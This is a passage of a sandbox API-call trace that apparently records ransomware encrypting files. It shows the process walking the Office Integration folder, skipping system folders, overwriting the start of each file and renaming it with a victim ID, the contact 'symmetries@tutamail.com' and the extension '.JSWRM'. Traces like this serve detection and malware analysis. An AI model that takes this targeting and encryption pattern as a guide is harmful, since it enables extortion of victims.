dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.259] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.260] CloseHandle (hObject=0x45c) returned 1 [0102.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0102.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0102.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0102.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0102.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0102.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0102.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0102.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0102.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.260] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\QFE31928.msp" (normalized: "c:\\program files\\microsoft office\\root\\integration\\qfe31928.msp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\QFE31928.msp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\qfe31928.msp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0102.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0102.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0102.261] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd44a0845, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd44a0845, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd455f44d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc0e000, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SPPRedist.msi", cAlternateFileName="SPPRED~1.MSI")) returned 1 [0102.262] lstrcmpiW (lpString1="SPPRedist.msi", lpString2=".") returned 1 [0102.262] lstrcmpiW (lpString1="SPPRedist.msi", lpString2="..") returned 1 [0102.262] lstrcmpiW (lpString1="SPPRedist.msi", lpString2="...") returned 1 [0102.262] lstrcmpiW (lpString1="SPPRedist.msi", lpString2="windows") returned -1 [0102.262] lstrcmpiW (lpString1="SPPRedist.msi", lpString2="recovery") returned 1 [0102.262] lstrcmpiW (lpString1="SPPRedist.msi", lpString2="perflogs") returned 1 [0102.262] lstrcmpiW (lpString1="SPPRedist.msi", lpString2="documents and settings") returned 1 [0102.262] lstrcmpiW (lpString1="SPPRedist.msi", lpString2="$RECYCLE.BIN") returned 1 [0102.262] lstrcmpiW (lpString1="SPPRedist.msi", lpString2="system volume information") returned -1 [0102.262] lstrcmpiW (lpString1="SPPRedist.msi", lpString2="msocache") returned 1 [0102.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0102.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPPRedist.msi", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPPRedist.msi", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPPRedist.msi", lpUsedDefaultChar=0x0) returned 13 [0102.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0102.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0102.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPPRedist.msi", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPPRedist.msi", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPPRedist.msi", lpUsedDefaultChar=0x0) returned 13 [0102.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0102.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0102.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0102.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0102.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\SPPRedist.msi" (normalized: "c:\\program files\\microsoft office\\root\\integration\\sppredist.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.263] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=12640256) returned 1 [0102.263] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.263] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.305] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.305] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.306] CloseHandle (hObject=0x45c) returned 1 [0102.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0102.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0102.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0102.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0102.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0102.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0102.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0102.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0102.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.306] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\SPPRedist.msi" (normalized: "c:\\program files\\microsoft office\\root\\integration\\sppredist.msi"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\SPPRedist.msi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\sppredist.msi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0102.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0102.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0102.307] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x51c07e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51c07e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x51c07e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfa976, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0102.308] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".") returned 1 [0102.308] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="..") returned 1 [0102.308] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="...") returned 1 [0102.308] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="windows") returned 1 [0102.308] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="recovery") returned 1 [0102.308] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="perflogs") returned 1 [0102.308] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="documents and settings") returned 1 [0102.308] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="$RECYCLE.BIN") returned 1 [0102.308] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="system volume information") returned 1 [0102.308] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="msocache") returned 1 [0102.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB2999226-x64.msu", lpUsedDefaultChar=0x0) returned 28 [0102.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0102.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x64.msu", cchWideChar=28, lpMultiByteStr=0x2411f0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB2999226-x64.msu", lpUsedDefaultChar=0x0) returned 28 [0102.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0102.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0102.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0102.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.310] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1026422) returned 1 [0102.310] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.310] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.334] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.334] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.334] CloseHandle (hObject=0x45c) returned 1 [0102.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0102.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0102.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0102.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0102.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0102.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0102.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.335] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows6.1-kb2999226-x64.msu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows6.1-KB2999226-x64.msu.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows6.1-kb2999226-x64.msu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0102.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0102.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0102.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0102.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.336] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x97da2, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WI4D05~1.MSU")) returned 1 [0102.336] lstrcmpiW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2=".") returned 1 [0102.337] lstrcmpiW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="..") returned 1 [0102.337] lstrcmpiW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="...") returned 1 [0102.337] lstrcmpiW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="windows") returned 1 [0102.337] lstrcmpiW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="recovery") returned 1 [0102.337] lstrcmpiW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="perflogs") returned 1 [0102.337] lstrcmpiW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="documents and settings") returned 1 [0102.337] lstrcmpiW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="$RECYCLE.BIN") returned 1 [0102.337] lstrcmpiW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="system volume information") returned 1 [0102.337] lstrcmpiW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="msocache") returned 1 [0102.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x86.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0102.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x86.msu", cchWideChar=28, lpMultiByteStr=0x241038, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB2999226-x86.msu", lpUsedDefaultChar=0x0) returned 28 [0102.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x86.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0102.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB2999226-x86.msu", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB2999226-x86.msu", lpUsedDefaultChar=0x0) returned 28 [0102.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0102.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0102.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0102.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows6.1-KB2999226-x86.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows6.1-kb2999226-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.339] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=621986) returned 1 [0102.339] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.340] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.354] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.354] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.354] CloseHandle (hObject=0x45c) returned 1 [0102.355] 